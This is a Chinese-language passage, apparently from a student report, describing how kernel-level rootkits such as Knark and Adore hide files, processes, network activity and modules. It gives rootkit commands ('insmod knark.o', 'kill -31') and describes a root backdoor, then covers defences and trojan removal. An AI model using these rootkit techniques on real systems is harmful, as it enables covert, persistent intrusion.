50、ix系统的和传统的Rootkit不同，Unix的bin/login并未被修改，但所有执行/bin/login的请求(当登陆系统时将产生)都被重定向到攻击者制作的隐藏文件/bin/backdoorlogin，这样当系统管理员使用检测传统级别的Rootkit的方法(比如用tripwire之类的软件检测文件的完整性)就行不通了,因为/bin/login并没有被改变。同样的道理，攻击者对其他的系统程序也进行重定，这样你的操作实际就是按照入侵者的意愿执行了。也就是说，表面上你在运行程序A,你也认为自己运行的是程序A,而实际上你运行的是入侵者设定的程序B! 更恐怖的是,内核级Rootkit不仅仅只会进行执

51、行重定向，许多内核级Rootkit还支持文件隐蔽。传统的Rootkit是通过替换ls程序来实现文件的隐藏，而内核级的Rootkit则是通过对内核的修改来对ls程序欺骗,更加的阴险隐蔽。另外内核级的Rootkit还能对进程和网络进行隐藏，用户将得不到真实的系统情况报告。 实现思路:根据系统的类型，攻击者有不同的方法来对内核进行修改，在N种Unix系统上修改内核最简单的方法就是利用系统本身的加载的内核模块(LKM)的功能，因此大多数的内核级Rootkit通过利用LKM动态地将内核更新来提供新功能，新添加的模块扩展了内核，同时对内核和其他使用内核的所有东西有了完全访问权。 因此，许多内核级Rootk

52、it都通过LKM来实现。安装通过LKM实现的内核级Rootkit十分简单。例如，在Linux上安装Knark内核级Rootkit只需具有根权限的入侵者输入命令:insmodknark.o就行了，模块被安装后就等着我们输入命令了。更妙的是整个过程不需要重启.。通过LKM实现的Rootkit在Unix上十分流行。我们也常常会通过给windows平台打LKM补丁的方法攻击windows. 内核级Rootkit 一、linux上的内核级Rootkit:Knark Knark具有各种标准的内核级Rootkit功能，包括执行重定向，文件隐藏，进程隐藏和网络隐藏。另外，还有不少比较过瘾的功能，如: 1、远程

53、执行:我们可以通过网络向运行Knark的机器发送一条命令，源地址是假造的， 命令被发往UDP端口53,使之表面上看起来像是DNS流量。我们就可以利用这个功能 来升级Knark，删除系统文件或其他任何我们想做的事 2、任务攻击:当某一进程在系统上运行时，它总是具有与UID和有效的UID(EUID)相关的权限。另外进程还具有与文件系统UID(FSUID)相关的文件及目录访问权。Knark的任务攻击能力可实时地将进程UID,EUID和FSUID改变。进程在不停止运动的情况下突然具有了新的权限 3、隐藏混杂模式: 同一般的RootKit一样，入侵者也会在受害者机器上运行嗅探器。我们可以用文件隐藏和进程

54、隐藏将嗅探器隐藏起来。然而，以太网卡会被设成混杂模式，管理员可以检查到这一点Knark将内核进行了修改，使之隐瞒网卡的混合模式，这将使嗅探变得更加隐秘。 4、实时进程隐藏: Knark可以将一个正在运行的进程隐藏起来。通过发送信号31给一个进程，此进程将消失，但仍在运行。命令kill-31process_id将阻止内核汇报任何有关此进程的信息。进程在运行时，ps和lsof命令的使用都不能显示此进程 5、内核模块隐藏:Linux中的lsmod命令可以列出当前在机器上安装的LKM.,我们自然不想让管理员看到Knark模块，因此Knark包含了一个单独的模块modhide,modhide将Knark

55、 和自己隐藏了起来。这样，当我们用Knark攻击一个系统时，我们首先为Knark.o做一个insmod,然后为modhide.o做一个insmod。这样不管谁运行lsmod命令，这些模块都不会被发现二、另一个Linux上的内核级Rootkit:Adore同Knark一样，Adore也是一个针对Linux的LKMRootKit.他包含了标准的内核级Rootkit功能，如文件隐藏，进程隐藏，网络隐藏和内核模块隐藏。我们只所以讨论Adore，是因为他还有一个非常强大的功能:内置的根权限后门。Adore的根权限后门可以让我们连接到系统上并获得根权限的命令外壳，此功能十分直接了当，Adore将此功能巧妙

56、的包含在内核模块中了。这一招十分难破，因为管理员看不到任何文件、进程、侦听网络端口的迹象。 防御办法:防御内核级的Rootkit的根本办法是不要让攻击者得到你的机器的系统的根本权限(Unix里的root和windows里的admin),不过这看起来像废话:)，目前对内核级的Rootkit还没有绝对的防御体系。 现在也存在一些Rootkit自动检测工具，但都不是很可靠.同时内核级的Rootkit也在不断的发展中，对一些系统来说防御它最好的办法是使用不支持LKM的内核，Linux的内核就可以设成不支持LKM的单一内核。 下面是一些图例，普通应用级别的木马后门第五章 木马的防范与清除 5.1 木马的

57、清除木马的清除可以选用现在主流的杀毒软件和木马专杀软件来查杀和清除，现在360安全卫士具备这一能力，早段时间中了超级木马，就是选用360查杀清除掉木马。5.2 抵抗图片型木马的方法先说一下现在比较流行的2种图片木马病毒。 第一种，老方法，就是把木马伪装成一个病毒，需要通过用户点击图片进而触发木马的下载，运作。 第二种，就是大家现在都担心的，无声无息就能入侵你电脑的图片病毒，不需要点击。这种病毒主要是利用了Windows的漏洞，把木马加载在图片中，只要没有打上相应补丁的电脑游览到这些图片的时候就会自动下载该图片信息中所包含的木马信息，进而达到木马种植功能 那么解决和防范的方法是什么呢？ 关于第一种，因为需要通过点击后自动下载，所以尽量不要点击有怀疑